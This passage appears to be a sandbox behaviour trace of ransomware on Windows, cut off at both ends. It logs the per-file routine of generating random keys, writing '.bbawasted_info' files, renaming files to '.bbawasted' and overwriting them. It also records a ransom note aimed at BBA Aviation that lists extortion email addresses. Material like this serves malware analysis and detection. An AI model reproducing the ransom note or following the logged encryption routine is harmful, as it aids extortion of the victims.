FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]AJkTPKdQQ8wYDiEKrHoCSzeos9sq+35eXvkT/noq+kq6EMzIR9ll8JMhN5b19uQC\r\nUVzhttpfpEB9+ccasLpBtjv2UD5N+0ks7FtO79KO1Bc9srYkisvmKKaQpbHfYnS1\r\nTr5/pcBZUDO4K8y1LQsjGnZAqIZpsiF0Y3dRfVTmEUb3EPIs5w6dwC9iXDuloxnr\r\nzoLCNGLRyvLjK69LKqy6+9cWNAL/rIRMmgRYvhYMYmbQncupXIHYEdksXZnBEQWj\r\nYIeBh+HUS6H9bXhShsa3Yd939Lu601cD5vjKrqqywgTaO3/yyDKNmtmpGUlF9Gdb\r\n3NoeS3nmre7i1QozQ5ry4CcAi0VKnr1D66IKaLaJnlnHvGqrQvA4uG6zos8EdU6B\r\nfb4xhhJVtIz9u/JbU6j/MmYABsWgGofRzbNCcTvVJeXJC9Yv1Nz1vz4mRhmHHAmc\r\n7g5XCzZgjEaJ3Dk8H2ngVh9ifUF/oKmUlbcW/sLCmIqroAKU/rtbpY71J9iaZAw9\r\nui7DPExFP1c35eTA5A4R3wlw0e5A/nB3ocsiPyi1lG4UIglCV6Xw2zwR4eWkom0g\r\npn3dOOweUgLNckLScUfG4zQf4CI7gK1gfm4dgQ7bwBL/Zz+88F1y1fGeg8mN6Iu3\r\nLjerocRuU/A+uJ/ddoOM281b2JeDDS8yVU/hljxxBdB=[end_key]\r\nKEEP IT\r\n") returned 984 [0238.531] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0238.531] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0238.531] SetEndOfFile (hFile=0x27c) returned 1 [0238.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.534] CloseHandle (hObject=0x27c) returned 1 [0238.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0238.534] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c2a88 | out: hHeap=0x660000) returned 1 [0238.535] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6130) returned 1 [0238.535] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0238.535] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0238.535] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-hk.htm") returned 56 [0238.536] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0238.536] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0238.536] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.536] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6790) returned 1 [0238.536] CryptGenRandom (in: hProv=0x6a6790, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0238.536] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0238.537] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-hk.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-hk.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0238.538] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0238.540] SetEndOfFile (hFile=0x27c) returned 1 [0238.540] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.540] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.540] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0238.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-hk.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-hk.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-hk.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-hk.htm.bbawasted")) returned 1 [0238.541] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-hk.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-hk.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0238.542] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0238.542] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x23ec4 [0238.542] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23ec4) returned 0xd80000 [0238.542] CloseHandle (hObject=0x28c) returned 1 [0238.641] UnmapViewOfFile (lpBaseAddress=0xd80000) returned 1 [0238.643] CloseHandle (hObject=0x290) returned 1 [0238.643] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa7e8 [0238.643] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6020) returned 1 [0238.644] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x1b8, pbBuffer=0x6aa830 | out: pbBuffer=0x6aa830) returned 1 [0238.644] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0238.644] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a60a8) returned 1 [0238.645] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0238.645] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0238.657] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0238.658] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa7e8 | out: hHeap=0x660000) returned 1 [0238.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.658] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]i5LSTnov9AizbSeWsWVrbUwXWoT0Lhpxsi289DcjVNoqG/Wz1r3qj4g2KE5kVKX0\r\nwDYCptC+S8Ocx6o/Yl8dgaiYc9KzqA7Nzg5tOgljR3On9J1umVqd+PJJrAIXApIn\r\n9+110B5WBJeD2jY+8XkxvSxnpbBa1XQa2bt+a8JLx6TapZrrMnLBkq+nhZ11blTh\r\nmIKOBZbq+3uDhr8iue/RuHkism/mgDJbBE/ow+oStVQhGrCT1JIOjD8i+j7QKVnN\r\nAdhAU8Fogbb8YLtB4bmNFugheUd7TU9Myzdlhh3vnO/dpI+AFNFTqGJh6DoQASbv\r\nq3SIA8o8Dwl83E9GVSZfH4KdnwGnf0+E8Qz52kd32hAosPEfRshu/nn/5vvQRuaQ\r\nj8Uiag4aKgKzfU6J/l8COZO8DjSy1k4X1PLjWPWBcNvLBf1sh2kEiMgo408uJoeB\r\nKv7URuzeTRiMhEYst5Oh0p9m2Ubgo1TdG2WkNQZ9rmSYs/ybB6OsnOkAstAAw3wU\r\no6M1mD5UR67zhqmLmhLUSSCPyCRxbxeRfue/TJo6whXSVu6V4kCDRk+T+gCX52jE\r\ns3SHNwULlf1229zUKf2Vf0wOWpQdqtYOIZiKhiBbz9iqQtYU/KPgaEPQW5V2M68N\r\nnjXEGlvvMFP0q6wCoiJICuUxj7nzeUrn0CC/fXt3kl5=[end_key]\r\nKEEP IT\r\n") returned 984 [0238.658] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0238.658] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0238.658] SetEndOfFile (hFile=0x27c) returned 1 [0238.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.662] CloseHandle (hObject=0x27c) returned 1 [0238.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0238.662] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c2678 | out: hHeap=0x660000) returned 1 [0238.662] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6350) returned 1 [0238.663] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0238.663] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0238.663] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\eula.css") returned 45 [0238.663] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x264) returned 0x6c4b88 [0238.663] lstrcpyW (in: lpString1=0x6c4be2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0238.663] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.663] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a62c8) returned 1 [0238.664] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0238.664] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0238.664] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\eula.css.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula.css.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0238.664] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0238.666] SetEndOfFile (hFile=0x27c) returned 1 [0238.666] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.666] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.666] lstrcpyW (in: lpString1=0x6c4be2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0238.667] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\eula.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula.css"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\eula.css.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula.css.bbawasted")) returned 1 [0238.669] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\eula.css.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula.css.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0238.669] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0238.669] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x52 [0238.669] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x52) returned 0x5f0000 [0238.669] CloseHandle (hObject=0x290) returned 1 [0238.670] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0238.670] CloseHandle (hObject=0x28c) returned 1 [0238.670] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa7e8 [0238.670] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0238.671] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x6aa830 | out: pbBuffer=0x6aa830) returned 1 [0238.671] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0238.671] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a65f8) returned 1 [0238.671] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0238.671] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0238.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0238.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa7e8 | out: hHeap=0x660000) returned 1 [0238.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0238.814] _snwprintf (in: _Dest=0x6ae598, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Foa0jN2rXGlT1k4Ukx6EgU0S57bZCbAfUO14YQv/k/3CNNEpF9cSasgU9h3Pxwm3\r\nxMjA28BwzvkZOWJYe+9Z0ddArKbdvrwgMmM7BN6CxfEclOraS546ZQqLSR5SelVF\r\ncLGKAUFqpTJ0J+3Z5oSR1Sk6ZV/CyfSr8roFR4xa7EM7NPkneHVcqEqch4PxzHQj\r\nD0dxi/S6G9eMYFfoTlSYfcw6a9KJeu4mcpr4fA4GulWwNRxXz4xu6uF4ES35r1j5\r\nts3edjKlr8qwbIipEHgTTHeAwfiz/2LJDpFEkeoGZUgHYBuOPCNGxehM8MyyCZWV\r\neD2GLKsFx6Sr9GrBHeolSIdEPEW1JWvBZmMjIWN2/gA2+X6UFUg+X6jIHITPgpNQ\r\nF9aDbfK2XSxdp32f84gAtwK9kiFWp7tN7h/G0q0UXFjkaAPioPTF7S0eXugDT61x\r\nDow76FhRqxpfhG/4RI9l2Pu28PBBJXsLSyQVz4qspZwwe1PTEytph9Tg0WI8C1bB\r\nufgGXnADAVaFGDpzPh5Q38E2CadlcNM6PK8s7bx/psRHySy20JPUZ/qBEWars21Q\r\n/2PCEU3wAwZa6fKbh7slIMiN/0ArWk9j7ZGBUWY7P15y8L2vKbuAUZZSfY0LBhy/\r\nHIMtkg1uor0dfHhsbiqcfzv9+VgudVR4CkJAITU/tng=[end_key]\r\nKEEP IT\r\n") returned 984 [0238.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0238.814] WriteFile (in: hFile=0x27c, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0238.814] SetEndOfFile (hFile=0x27c) returned 1 [0238.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0238.816] CloseHandle (hObject=0x27c) returned 1 [0238.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0238.817] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdc28 | out: hHeap=0x660000) returned 1 [0238.817] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0238.817] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0238.817] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0238.817] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\GetStartedHoverOver.png") returned 60 [0238.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x282) returned 0x6c4b88 [0238.818] lstrcpyW (in: lpString1=0x6c4c00, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0238.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0238.818] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6020) returned 1 [0238.818] CryptGenRandom (in: hProv=0x6a6020, dwLen=0xa3a, pbBuffer=0x6ae598 | out: pbBuffer=0x6ae598) returned 1 [0238.818] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0238.818] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\GetStartedHoverOver.png.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstartedhoverover.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0238.820] WriteFile (in: hFile=0x27c, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0238.822] SetEndOfFile (hFile=0x27c) returned 1 [0238.822] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.822] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0238.822] lstrcpyW (in: lpString1=0x6c4c00, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0238.822] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\GetStartedHoverOver.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstartedhoverover.png"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\GetStartedHoverOver.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstartedhoverover.png.bbawasted")) returned 1 [0238.823] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\GetStartedHoverOver.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstartedhoverover.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0238.823] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0238.824] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xfe3 [0238.824] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfe3) returned 0x5f0000 [0238.824] CloseHandle (hObject=0x290) returned 1 [0238.828] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0238.829] CloseHandle (hObject=0x28c) returned 1 [0238.829] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aabf8 [0238.829] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6460) returned 1 [0238.829] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x1b8, pbBuffer=0x6aac40 | out: pbBuffer=0x6aac40) returned 1 [0238.829] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0238.830] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6c58) returned 1 [0238.830] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0238.830] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0238.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0238.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aabf8 | out: hHeap=0x660000) returned 1 [0238.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0238.844] _snwprintf (in: _Dest=0x6ae598, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]btLfXEMgYKkiggvLutNzz541PhekPsWV8wNCdjdFO2NPcpRi4YibgJ/UlbDMwjF/\r\nz+33tXCo8OKM8+4N58k7Nnd3t1jdRvVl6dtGtBjHKTWbfjy0B0P5fykXAWX5ktzj\r\nUlPC3fUQKYMVEF98M71Z78lAsYG8ryxllOqw8a0aBDDLqzsh3l4LnER0vx4iGX1w\r\nEvCPKCTdVaXDyxUs3k9LZwoBeZOfXYXwBFJkZSkVg+yzoAof2MY+4MntMAw54/mF\r\n9ZjfjcvhepfBf3FpoNXsxfs6k9f4hBazbnPv1OQUyrdru/Vuwr8dcwef7D+rTp0N\r\nj3rhltUO6/cItIT7Cq/OCHk0Hzb+Exio1FJzrRWfxI0IyXDrMJTMLYcj/eec1A05\r\ndAyFoyRdue54bl25Zo/OcHD1es0VUhrk7b+fWwO7qFWWUOdrYaziHYN7bp5lmWHD\r\nfClscCh+W4zxT8hOOZqofUFO48cagMjgg7KQcJlEIwiStX0sus/ANN+m8OGzXnyw\r\nsIKr/ojgvWQytL9YkBsTrQSsgHN9VIq9SWG/98hRQmpN+Xm4QZS5+z7cvx0qivk4\r\n/Iymhnc1tjmdv5FOpLvg4+kxZb+iYI1X/2XilP77LzLpB4tfo7j8RWeHSs3BD09D\r\nSPsSdEDIVRayWUSNyp3aMpzQMBQnhurE9VKdWdUlm8c=[end_key]\r\nKEEP IT\r\n") returned 984 [0238.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0238.844] WriteFile (in: hFile=0x27c, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0238.845] SetEndOfFile (hFile=0x27c) returned 1 [0238.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0238.847] CloseHandle (hObject=0x27c) returned 1 [0238.848] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0238.848] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a7180 | out: hHeap=0x660000) returned 1 [0238.848] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5e88) returned 1 [0238.849] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0238.849] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0238.849] lstrlenW 